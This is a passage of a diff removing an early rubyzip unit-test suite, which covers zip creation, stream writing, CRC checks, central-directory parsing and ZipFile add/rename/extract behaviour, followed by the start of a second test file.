-      raise "failed to create test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("zip #{TEST_ZIP2.zipName} #{TEST_ZIP2.entryNames.join(' ')}")
-
-      # without bash system interprets everything after echo as parameters to
-      # echo including | zip -z ...
-      raise "failed to add comment to test zip '#{TEST_ZIP2.zipName}'" unless 
-  system("bash -c \"echo #{TEST_ZIP2.comment} | zip -z #{TEST_ZIP2.zipName}\"")
-
-      raise "failed to create test zip '#{TEST_ZIP3.zipName}'" unless 
-  system("zip #{TEST_ZIP3.zipName} #{TEST_ZIP3.entryNames.join(' ')}")
-
-      raise "failed to create test zip '#{TEST_ZIP4.zipName}'" unless 
-  system("zip #{TEST_ZIP4.zipName} #{TEST_ZIP4.entryNames.join(' ')}")
-    end
-  rescue 
-    raise $!.to_s + 
-      "\n\nziptest.rb requires the Info-ZIP program 'zip' in the path\n" +
-      "to create test data. If you don't have it you can download\n"   +
-      "the necessary test files at http://sf.net/projects/rubyzip."
-  end
-
-  TEST_ZIP1 = TestZipFile.new("empty.zip", [])
-  TEST_ZIP2 = TestZipFile.new("4entry.zip", %w{ longAscii.txt empty.txt short.txt longBinary.bin}, 
-            "my zip comment")
-  TEST_ZIP3 = TestZipFile.new("test1.zip", %w{ file1.txt })
-  TEST_ZIP4 = TestZipFile.new("zipWithDir.zip", [ "file1.txt", 
-        TestFiles::EMPTY_TEST_DIR])
-end
-
-
-class AbstractOutputStreamTest < RUNIT::TestCase
-  class TestOutputStream
-    include AbstractOutputStream
-
-    attr_accessor :buffer
-
-    def initialize
-      @buffer = ""
-    end
-
-    def << (data)
-      @buffer << data
-      self
-    end
-  end
-
-  def setup
-    @outputStream = TestOutputStream.new
-
-    @origCommaSep = $,
-    @origOutputSep = $\
-  end
-
-  def teardown
-    $, = @origCommaSep
-    $\ = @origOutputSep
-  end
-
-  def test_write
-    count = @outputStream.write("a little string")
-    assert_equals("a little string", @outputStream.buffer)
-    assert_equals("a little string".length, count)
-
-    count = @outputStream.write(". a little more")
-    assert_equals("a little string. a little more", @outputStream.buffer)
-    assert_equals(". a little more".length, count)
-  end
-  
-  def test_print
-    $\ = nil # record separator set to nil
-    @outputStream.print("hello")
-    assert_equals("hello", @outputStream.buffer)
-
-    @outputStream.print(" world.")
-    assert_equals("hello world.", @outputStream.buffer)
-    
-    @outputStream.print(" You ok ",  "out ", "there?")
-    assert_equals("hello world. You ok out there?", @outputStream.buffer)
-
-    $\ = "\n"
-    @outputStream.print
-    assert_equals("hello world. You ok out there?\n", @outputStream.buffer)
-
-    @outputStream.print("I sure hope so!")
-    assert_equals("hello world. You ok out there?\nI sure hope so!\n", @outputStream.buffer)
-
-    $, = "X"
-    @outputStream.buffer = ""
-    @outputStream.print("monkey", "duck", "zebra")
-    assert_equals("monkeyXduckXzebra\n", @outputStream.buffer)
-
-    $\ = nil
-    @outputStream.buffer = ""
-    @outputStream.print(20)
-    assert_equals("20", @outputStream.buffer)
-  end
-  
-  def test_printf
-    @outputStream.printf("%d %04x", 123, 123) 
-    assert_equals("123 007b", @outputStream.buffer)
-  end
-  
-  def test_putc
-    @outputStream.putc("A")
-    assert_equals("A", @outputStream.buffer)
-    @outputStream.putc(65)
-    assert_equals("AA", @outputStream.buffer)
-  end
-
-  def test_puts
-    @outputStream.puts
-    assert_equals("\n", @outputStream.buffer)
-
-    @outputStream.puts("hello", "world")
-    assert_equals("\nhello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts("hello\n", "world\n")
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-    
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"])
-    assert_equals("hello\nworld\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(["hello\n", "world\n"], "bingo")
-    assert_equals("hello\nworld\nbingo\n", @outputStream.buffer)
-
-    @outputStream.buffer = ""
-    @outputStream.puts(16, 20, 50, "hello")
-    assert_equals("16\n20\n50\nhello\n", @outputStream.buffer)
-  end
-end
-
-
-module CrcTest
-  def runCrcTest(compressorClass)
-    str = "Here's a nice little text to compute the crc for! Ho hum, it is nice nice nice nice indeed."
-    fakeOut = AbstractOutputStreamTest::TestOutputStream.new
-    
-    deflater = compressorClass.new(fakeOut)
-    deflater << str
-    assert_equals(0x919920fc, deflater.crc)
-  end
-end
-
-
-
-class PassThruCompressorTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_size
-    File.open("dummy.txt", "wb") {
-      |file|
-      compressor = PassThruCompressor.new(file)
-      
-      assert_equals(0, compressor.size)
-      
-      t1 = "hello world"
-      t2 = ""
-      t3 = "bingo"
-      
-      compressor << t1
-      assert_equals(compressor.size, t1.size)
-      
-      compressor << t2
-      assert_equals(compressor.size, t1.size + t2.size)
-      
-      compressor << t3
-      assert_equals(compressor.size, t1.size + t2.size + t3.size)
-    }
-  end
-
-  def test_crc
-    runCrcTest(PassThruCompressor)
-  end
-end
-
-class DeflaterTest < RUNIT::TestCase
-  include CrcTest
-
-  def test_outputOperator
-    txt = loadFile("ziptest.rb")
-    deflate(txt, "deflatertest.bin")
-    inflatedTxt = inflate("deflatertest.bin")
-    assert_equals(txt, inflatedTxt)
-  end
-
-  private
-  def loadFile(fileName)
-    txt = nil
-    File.open(fileName, "rb") { |f| txt = f.read }
-  end
-
-  def deflate(data, fileName)
-    File.open(fileName, "wb") {
-      |file|
-      deflater = Deflater.new(file)
-      deflater << data
-      deflater.finish
-      assert_equals(deflater.size, data.size)
-      file << "trailing data for zlib with -MAX_WBITS"
-    }
-  end
-
-  def inflate(fileName)
-    txt = nil
-    File.open(fileName, "rb") {
-      |file|
-      inflater = Inflater.new(file)
-      txt = inflater.read
-    }
-  end
-
-  def test_crc
-    runCrcTest(Deflater)
-  end
-end
-
-class ZipOutputStreamTest < RUNIT::TestCase
-  include AssertEntry
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "output.zip"
-
-  def test_new
-    zos = ZipOutputStream.new(TEST_ZIP.zipName)
-    zos.comment = TEST_ZIP.comment
-    writeTestZip(zos)
-    zos.close
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_open
-    ZipOutputStream.open(TEST_ZIP.zipName) {
-      |zos|
-      zos.comment = TEST_ZIP.comment
-      writeTestZip(zos)
-    }
-    assertTestZipContents(TEST_ZIP)
-  end
-
-  def test_writingToClosedStream
-    assertIOErrorInClosedStream { |zos| zos << "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.puts "hello world" }
-    assertIOErrorInClosedStream { |zos| zos.write "hello world" }
-  end
-
-  def test_cannotOpenFile
-    name = TestFiles::EMPTY_TEST_DIR
-    begin
-      zos = ZipOutputStream.open(name)
-    rescue Exception
-      assert($!.kind_of?(Errno::EISDIR) || # Linux 
-       $!.kind_of?(Errno::EEXIST) || # Windows/cygwin
-       $!.kind_of?(Errno::EACCES),   # Windows
-        "Expected Errno::EISDIR (or on win/cygwin: Errno::EEXIST), but was: #{$!.type}")
-    end
-  end
-
-  def assertIOErrorInClosedStream
-    assert_exception(IOError) {
-      zos = ZipOutputStream.new("test_putOnClosedStream.zip")
-      zos.close
-      yield zos
-    }
-  end
-
-  def writeTestZip(zos)
-    TEST_ZIP.entryNames.each {
-      |entryName|
-      zos.putNextEntry(entryName)
-      File.open(entryName, "rb") { |f| zos.write(f.read) }
-    }
-  end
-end
-
-
-
-module Enumerable
-  def compareEnumerables(otherEnumerable)
-    otherAsArray = otherEnumerable.to_a
-    index=0
-    each_with_index {
-      |element, index|
-      return false unless yield(element, otherAsArray[index])
-    }
-    return index+1 == otherAsArray.size
-  end
-end
-
-
-class ZipCentralDirectoryEntryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open("testDirectory.bin", "rb") {
-      |file|
-      entry = ZipEntry.readCDirEntry(file)
-      
-      assert_equals("longAscii.txt", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(106490, entry.size)
-      assert_equals(3784, entry.compressedSize)
-      assert_equals(0xfcd1799c, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("empty.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(0, entry.size)
-      assert_equals(0, entry.compressedSize)
-      assert_equals(0x0, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("short.txt", entry.name)
-      assert_equals(ZipEntry::STORED, entry.compressionMethod)
-      assert_equals(6, entry.size)
-      assert_equals(6, entry.compressedSize)
-      assert_equals(0xbb76fe69, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals("longBinary.bin", entry.name)
-      assert_equals(ZipEntry::DEFLATED, entry.compressionMethod)
-      assert_equals(1000024, entry.size)
-      assert_equals(70847, entry.compressedSize)
-      assert_equals(0x10da7d59, entry.crc)
-      assert_equals("", entry.comment)
-
-      entry = ZipEntry.readCDirEntry(file)
-      assert_equals(nil, entry)
-# Fields that are not check by this test:
-#          version made by                 2 bytes
-#          version needed to extract       2 bytes
-#          general purpose bit flag        2 bytes
-#          last mod file time              2 bytes
-#          last mod file date              2 bytes
-#          compressed size                 4 bytes
-#          uncompressed size               4 bytes
-#          disk number start               2 bytes
-#          internal file attributes        2 bytes
-#          external file attributes        4 bytes
-#          relative offset of local header 4 bytes
-
-#          file name (variable size)
-#          extra field (variable size)
-#          file comment (variable size)
-
-    }
-  end
-
-  def test_ReadEntryFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read(12) } # cdir entry header is at least 46 bytes
-    fragment.extend(IOizeString)
-    entry = ZipEntry.new
-    entry.readCDirEntry(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-end
-
-class ZipCentralDirectoryTest < RUNIT::TestCase
-
-  def test_readFromStream
-    File.open(TestZipFile::TEST_ZIP2.zipName, "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.readFromStream(zipFile)
-
-      assert_equals(TestZipFile::TEST_ZIP2.entryNames.size, cdir.size)
-      assert(cdir.compareEnumerables(TestZipFile::TEST_ZIP2.entryNames) { 
-          |cdirEntry, testEntryName|
-          cdirEntry.name == testEntryName
-        })
-      assert_equals(TestZipFile::TEST_ZIP2.comment, cdir.comment)
-    }
-  end
-
-  def test_readFromInvalidStream
-    File.open("ziptest.rb", "rb") {
-      |zipFile|
-      cdir = ZipCentralDirectory.new
-      cdir.readFromStream(zipFile)
-    }
-    fail "ZipError expected!"
-  rescue ZipError
-  end
-
-  def test_ReadFromTruncatedZipFile
-    fragment=""
-    File.open("testDirectory.bin") { |f| fragment = f.read }
-    fragment.slice!(12) # removed part of first cdir entry. eocd structure still complete
-    fragment.extend(IOizeString)
-    entry = ZipCentralDirectory.new
-    entry.readFromStream(fragment)
-    fail "ZipError expected"
-  rescue ZipError
-  end
-
-  def test_writeToStream
-    entries = [ ZipEntry.new("file.zip", "flimse", "myComment", "somethingExtra"),
-      ZipEntry.new("file.zip", "secondEntryName"),
-      ZipEntry.new("file.zip", "lastEntry.txt", "Has a comment too") ]
-    cdir = ZipCentralDirectory.new(entries, "my zip comment")
-    File.open("cdirtest.bin", "wb") { |f| cdir.writeToStream(f) }
-    cdirReadback = ZipCentralDirectory.new
-    File.open("cdirtest.bin", "rb") { |f| cdirReadback.readFromStream(f) }
-    
-    assert_equals(cdir.entries, cdirReadback.entries)
-  end
-
-  def test_equality
-    cdir1 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir2 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "my zip comment")
-    cdir3 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "secondEntryName"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    cdir4 = ZipCentralDirectory.new([ ZipEntry.new("file.zip", "flimse", nil, 
-               "somethingExtra"),
-             ZipEntry.new("file.zip", "lastEntry.txt") ], 
-           "comment?")
-    assert_equals(cdir1, cdir1)
-    assert_equals(cdir1, cdir2)
-
-    assert(cdir1 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir2 !=  cdir3)
-    assert(cdir3 !=  cdir4)
-
-    assert(cdir3 !=  "hello")
-  end
-end
-
-
-class BasicZipFileTest < RUNIT::TestCase
-  include AssertEntry
-
-  def setup
-    @zipFile = ZipFile.new(TestZipFile::TEST_ZIP2.zipName)
-    @testEntryNameIndex=0
-  end
-
-  def nextTestEntryName
-    retVal=TestZipFile::TEST_ZIP2.entryNames[@testEntryNameIndex]
-    @testEntryNameIndex+=1
-    return retVal
-  end
-    
-  def test_entries
-    assert_equals(TestZipFile::TEST_ZIP2.entryNames, @zipFile.entries.map {|e| e.name} )
-  end
-
-  def test_each
-    @zipFile.each {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_foreach
-    ZipFile.foreach(TestZipFile::TEST_ZIP2.zipName) {
-      |entry|
-      assert_equals(nextTestEntryName, entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStream
-    @zipFile.each {
-      |entry|
-      assertEntry(nextTestEntryName, @zipFile.getInputStream(entry), 
-      entry.name)
-    }
-    assert_equals(4, @testEntryNameIndex)
-  end
-
-  def test_getInputStreamBlock
-    fileAndEntryName = @zipFile.entries.first.name
-    @zipFile.getInputStream(fileAndEntryName) {
-      |zis|
-      assertEntryContentsForStream(fileAndEntryName, 
-           zis, 
-           fileAndEntryName)
-    }
-  end
-end
-
-class CommonZipFileFixture < RUNIT::TestCase
-  include AssertEntry
-
-  EMPTY_FILENAME = "emptyZipFile.zip"
-
-  TEST_ZIP = TestZipFile::TEST_ZIP2.clone
-  TEST_ZIP.zipName = "4entry_copy.zip"
-
-  def setup
-    File.delete(EMPTY_FILENAME) if File.exists?(EMPTY_FILENAME)
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-  end
-end
-
-class ZipFileTest < CommonZipFileFixture
-
-  def test_createFromScratch
-    comment  = "a short comment"
-
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.comment = comment
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals(comment, zfRead.comment)
-    assert_equals(0, zfRead.entries.length)
-  end
-
-  def test_add
-    srcFile   = "ziptest.rb"
-    entryName = "newEntryName.rb" 
-    assert(File.exists? srcFile)
-    zf = ZipFile.new(EMPTY_FILENAME, ZipFile::CREATE)
-    zf.add(entryName, srcFile)
-    zf.close
-
-    zfRead = ZipFile.new(EMPTY_FILENAME)
-    assert_equals("", zfRead.comment)
-    assert_equals(1, zfRead.entries.length)
-    assert_equals(entryName, zfRead.entries.first.name)
-    AssertEntry.assertContents(srcFile, 
-             zfRead.getInputStream(entryName) { |zis| zis.read })
-  end
-
-  def test_addExistingEntryName
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.add(zf.entries.first.name, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_addExistingEntryNameReplace
-    gotCalled = false
-    replacedEntry = nil
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      replacedEntry = zf.entries.first.name
-      zf.add(replacedEntry, "ziptest.rb") { gotCalled = true; true }
-    }
-    assert(gotCalled)
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assertContains(zf, replacedEntry, "ziptest.rb")
-    }
-  end
-
-  def test_addDirectory
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.add(TestFiles::EMPTY_TEST_DIR, TestFiles::EMPTY_TEST_DIR)
-    }
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      dirEntry = zf.entries.detect { |e| e.name == TestFiles::EMPTY_TEST_DIR+"/" } 
-      assert(dirEntry.isDirectory)
-    }
-  end
-
-  def test_remove
-    entryToRemove, *remainingEntries = TEST_ZIP.entryNames
-
-    File.copy(TestZipFile::TEST_ZIP2.zipName, TEST_ZIP.zipName)
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?(entryToRemove))
-    zf.remove(entryToRemove)
-    assert(! zf.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zf.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zfRead.entries.map { |e| e.name }.include?(entryToRemove))
-    assert_equals(zfRead.entries.map {|x| x.name }.sort, remainingEntries.sort) 
-    zfRead.close
-  end
-
-
-  def test_rename
-    entryToRename, *remainingEntries = TEST_ZIP.entryNames
-    
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(zf.entries.map { |e| e.name }.include?  entryToRename)
-    
-    newName = "changed name"
-    assert(! zf.entries.map { |e| e.name }.include?(newName))
-
-    zf.rename(entryToRename, newName)
-    assert(zf.entries.map { |e| e.name }.include?  newName)
-
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.map { |e| e.name }.include?  newName)
-    zfRead.close
-  end
-
-  def test_renameToExistingEntry
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-
-    assert_exception(ZipEntryExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) {
-  |zf|
-  zf.rename(zf.entries[0], zf.entries[1].name)
-      }
-    }
-
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameToExistingEntryOverwrite
-    oldEntries = nil
-    ZipFile.open(TEST_ZIP.zipName) { |zf| oldEntries = zf.entries }
-    
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.rename(zf.entries[0], zf.entries[1].name) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    oldEntries.delete_at(0)
-    ZipFile.open(TEST_ZIP.zipName) { 
-      |zf| 
-      assert_equals(oldEntries.map{ |e| e.name }, 
-        zf.entries.map{ |e| e.name })
-    }
-  end
-
-  def test_renameNonEntry
-    nonEntry = "bogusEntry"
-    targetEntry = "targetEntryName"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert(! zf.entries.include?(nonEntry))
-    assert_exception(ZipNoSuchEntryError) {
-      zf.rename(nonEntry, targetEntry)
-    }
-    zf.commit
-    assert(! zf.entries.include?(targetEntry))
-  ensure
-    zf.close
-  end
-
-  def test_renameEntryToExistingEntry
-    entry1, entry2, *remaining = TEST_ZIP.entryNames
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipEntryExistsError) {
-      zf.rename(entry1, entry2)
-    }
-  ensure 
-    zf.close
-  end
-
-  def test_replace
-    unchangedEntries = TEST_ZIP.entryNames.dup
-    entryToReplace = unchangedEntries.delete_at(2)
-    newEntrySrcFilename = "ziptest.rb" 
-
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    zf.replace(entryToReplace, newEntrySrcFilename)
-    
-    zf.close
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    AssertEntry::assertContents(newEntrySrcFilename, 
-        zfRead.getInputStream(entryToReplace) { |is| is.read })
-    zfRead.close    
-  end
-
-  def test_replaceNonEntry
-    entryToReplace = "nonExistingEntryname"
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      assert_exception(ZipNoSuchEntryError) {
-  zf.replace(entryToReplace, "ziptest.rb")
-      }
-    }
-  end
-
-  def test_commit
-    newName = "renamedFirst"
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    oldName = zf.entries.first
-    zf.rename(oldName, newName)
-    zf.commit
-
-    zfRead = ZipFile.new(TEST_ZIP.zipName)
-    assert(zfRead.entries.detect { |e| e.name == newName } != nil)
-    assert(zfRead.entries.detect { |e| e.name == oldName } == nil)
-    zfRead.close
-
-    zf.close
-  end
-
-  # This test tests that after commit, you
-  # can delete the file you used to add the entry to the zip file
-  # with
-  def test_commitUseZipEntry
-    File.copy(TestFiles::RANDOM_ASCII_FILE1, "okToDelete.txt")
-    zf = ZipFile.open(TEST_ZIP.zipName)
-    zf.add("okToDelete.txt", "okToDelete.txt")
-    assertContains(zf, "okToDelete.txt")
-    zf.commit
-    File.move("okToDelete.txt", "okToDeleteMoved.txt")
-    assertContains(zf, "okToDelete.txt", "okToDeleteMoved.txt")
-  end
-
-#  def test_close
-#    zf = ZipFile.new(TEST_ZIP.zipName)
-#    zf.close
-#    assert_exception(IOError) {
-#      zf.extract(TEST_ZIP.entryNames.first, "hullubullu")
-#    }
-#  end
-
-  def test_compound1
-    renamedName = "renamedName"
-    originalEntries = []
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-
-      assertNotContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-      zf.add(TestFiles::RANDOM_ASCII_FILE1, 
-       TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zf, TestFiles::RANDOM_ASCII_FILE1)
-
-      zf.rename(zf.entries[0], renamedName)
-      assertContains(zf, renamedName)
-
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, originalEntries.last.to_s)
-      zf.remove(originalEntries.last.to_s)
-      assertNotContains(zf, originalEntries.last.to_s)
-      
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      assertContains(zfRead, TestFiles::RANDOM_ASCII_FILE1)
-      assertContains(zfRead, renamedName)
-      TestFiles::BINARY_TEST_FILES.each {
-  |filename|
-  assertContains(zfRead, filename)
-      }
-      assertNotContains(zfRead, originalEntries.last.to_s)
-    ensure
-      zfRead.close
-    end
-  end
-
-  def test_compound2
-    begin
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      originalEntries = zf.entries.dup
-      
-      originalEntries.each {
-  |entry|
-  zf.remove(entry)
-  assertNotContains(zf, entry)
-      }
-      assert(zf.entries.empty?)
-      
-      TestFiles::ASCII_TEST_FILES.each {
-  |filename|
-  zf.add(filename, filename)
-  assertContains(zf, filename)
-      }
-      assert_equals(zf.entries.map { |e| e.name }, TestFiles::ASCII_TEST_FILES)
-      
-      zf.rename(TestFiles::ASCII_TEST_FILES[0], "newName")
-      assertNotContains(zf, TestFiles::ASCII_TEST_FILES[0])
-      assertContains(zf, "newName")
-    ensure
-      zf.close
-    end
-    begin
-      zfRead = ZipFile.new(TEST_ZIP.zipName)
-      asciiTestFiles = TestFiles::ASCII_TEST_FILES.dup
-      asciiTestFiles.shift
-      asciiTestFiles.each {
-  |filename|
-  assertContains(zf, filename)
-      }
-
-      assertContains(zf, "newName")
-    ensure
-      zfRead.close
-    end
-  end
-
-  private
-  def assertContains(zf, entryName, filename = entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} != nil, "entry #{entryName} not in #{zf.entries.join(', ')} in zip file #{zf}")
-    assertEntryContents(zf, entryName, filename) if File.exists?(filename)
-  end
-  
-  def assertNotContains(zf, entryName)
-    assert(zf.entries.detect { |e| e.name == entryName} == nil, "entry #{entryName} in #{zf.entries.join(', ')} in zip file #{zf}")
-  end
-end
-
-class ZipFileExtractTest < CommonZipFileFixture
-  EXTRACTED_FILENAME = "extEntry"
-  ENTRY_TO_EXTRACT, *REMAINING_ENTRIES = TEST_ZIP.entryNames.reverse
-
-  def setup
-    super
-    File.delete(EXTRACTED_FILENAME) if File.exists?(EXTRACTED_FILENAME)
-  end
-
-  def test_extract
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(ENTRY_TO_EXTRACT, EXTRACTED_FILENAME)
-      
-      assert(File.exists? EXTRACTED_FILENAME)
-      AssertEntry::assertContents(EXTRACTED_FILENAME, 
-          zf.getInputStream(ENTRY_TO_EXTRACT) { |is| is.read })
-    }
-  end
-
-  def test_extractExists
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    assert_exception(ZipDestinationFileExistsError) {
-      ZipFile.open(TEST_ZIP.zipName) { 
-  |zf| 
-  zf.extract(zf.entries.first, EXTRACTED_FILENAME) 
-      }
-    }
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert_equals(writtenText, f.read)
-    }
-  end
-
-  def test_extractExistsOverwrite
-    writtenText = "written text"
-    File.open(EXTRACTED_FILENAME, "w") { |f| f.write(writtenText) }
-
-    gotCalled = false
-    ZipFile.open(TEST_ZIP.zipName) {
-      |zf|
-      zf.extract(zf.entries.first, EXTRACTED_FILENAME) { gotCalled = true; true }
-    }
-
-    assert(gotCalled)
-    File.open(EXTRACTED_FILENAME, "r") {
-      |f|
-      assert(writtenText != f.read)
-    }
-  end
-
-  def test_extractNonEntry
-    zf = ZipFile.new(TEST_ZIP.zipName)
-    assert_exception(ZipNoSuchEntryError) { zf.extract("nonExistingEntry", "nonExistingEntry") }
-  ensure
-    zf.close if zf
-  end
-
-  def test_extractNonEntry2
-    outFile = "outfile"
-    assert_exception(ZipNoSuchEntryError) {
-      zf = ZipFile.new(TEST_ZIP.zipName)
-      nonEntry = "hotdog-diddelidoo"
-      assert(! zf.entries.include?(nonEntry))
-      zf.extract(nonEntry, outFile)
-      zf.close
-    }
-    assert(! File.exists?(outFile))
-  end
-
-end
-
-class ZipFileExtractDirectoryTest < CommonZipFileFixture
-  TEST_OUT_NAME = "emptyOutDir"
-
-  def openZip(&aProc)
-    assert(aProc != nil)
-    ZipFile.open(TestZipFile::TEST_ZIP4.zipName, &aProc)
-  end
-
-  def extractTestDir(&aProc)
-    openZip {
-      |zf|
-      zf.extract(TestFiles::EMPTY_TEST_DIR, TEST_OUT_NAME, &aProc)
-    }
-  end
-
-  def setup
-    super
-
-    Dir.rmdir(TEST_OUT_NAME)   if File.directory? TEST_OUT_NAME
-    File.delete(TEST_OUT_NAME) if File.exists?    TEST_OUT_NAME
-  end
-    
-  def test_extractDirectory
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-  
-  def test_extractDirectoryExistsAsDir
-    Dir.mkdir TEST_OUT_NAME
-    extractTestDir
-    assert(File.directory? TEST_OUT_NAME)
-  end
-
-  def test_extractDirectoryExistsAsFile
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    assert_exception(ZipDestinationFileExistsError) { extractTestDir }
-  end
-
-  def test_extractDirectoryExistsAsFileOverwrite
-    File.open(TEST_OUT_NAME, "w") { |f| f.puts "something" }
-    gotCalled = false
-    extractTestDir { 
-      |entry, destPath| 
-      gotCalled = true
-      assert_equals(TEST_OUT_NAME, destPath)
-      assert(entry.isDirectory)
-      true
-    }
-    assert(gotCalled)
-    assert(File.directory? TEST_OUT_NAME)
-  end
-end
-
-
-TestFiles::createTestFiles(ARGV.index("recreate") != nil || 
-         ARGV.index("recreateonly") != nil)
-TestZipFile::createTestZips(ARGV.index("recreate") != nil || 
-          ARGV.index("recreateonly") != nil)
-exit if ARGV.index("recreateonly") != nil
-
-#require 'runit/cui/testrunner'
-#RUNIT::CUI::TestRunner.run(ZipFileTest.suite)
-
-# Copyright (C) 2002 Thomas Sondergaard
-# rubyzip is free software; you can redistribute it and/or
-# modify it under the terms of the ruby license.
-#!/usr/bin/env ruby
-
-$VERBOSE = true
-
-require 'rubyunit'
-require 'zip'
-
-include Zip
-
-Dir.chdir "test"
-
-class AbstractInputStreamTest < RUNIT::TestCase
-  # AbstractInputStream subclass that provides a read method
-  
-  TEST_LINES = [ "Hello world#{$/}", 
-    "this is the second line#{$/}", 
-    "this is the last line"]
-  TEST_STRING = TEST_LINES.join
-  class TestAbstractInputStream 
-    include AbstractInputStream
-    def initialize(aString)
-      @contents = aString
-      @readPointer = 0
-    end
-
-    def read(charsToRead)
-      retVal=@contents[@readPointer, charsToRead]
-      @readPointer+=charsToRead
-      return retVal
-    end
-
-    def produceInput
-      read(100)
-    end
-
-    def inputFinished?
-      @contents[@readPointer] == nil
-    end
-  end
-
-  def setup
-    @io = TestAbstractInputStream.new(TEST_STRING)
-  end
-  
-  def test_gets
-    assert_equals(TEST_LINES[0], @io.gets)
-    assert_equals(TEST_LINES[1], @io.gets)
-    assert_equals(TEST_LINES[2], @io.gets)
-    assert_equals(nil, @io.gets)
-  end
-
-  def test_getsMultiCharSeperator
-    assert_equals("Hell", @io.gets("ll"))
-    assert_equals("o world#{$/}this is the second l", @io.gets("d l"))
-  end
-
-  def test_each_line
-    lineNumber=0
-    @io.each_line {
-      |line|
-      assert_equals(TEST_LINES[lineNumber], line)
-      lineNumber+=1
-    }
-  end
-
-  def test_readlines
-    assert_equals(TEST_LINES, @io.readlines)
-  end
-
-  def test_readline
-    test_gets
-    begin
-      @io.readline
-      fail "EOFError expected"
-      rescue EOFError
-    end
-  end
-end
-
-class ZipEntryTest < RUNIT::TestCase
-  TEST_ZIPFILE = "someZipFile.zip"
-  TEST_COMMENT = "a comment"
-  TEST_COMPRESSED_SIZE = 1234
-  TEST_CRC = 325324
-  TEST_EXTRA = "Some data here"
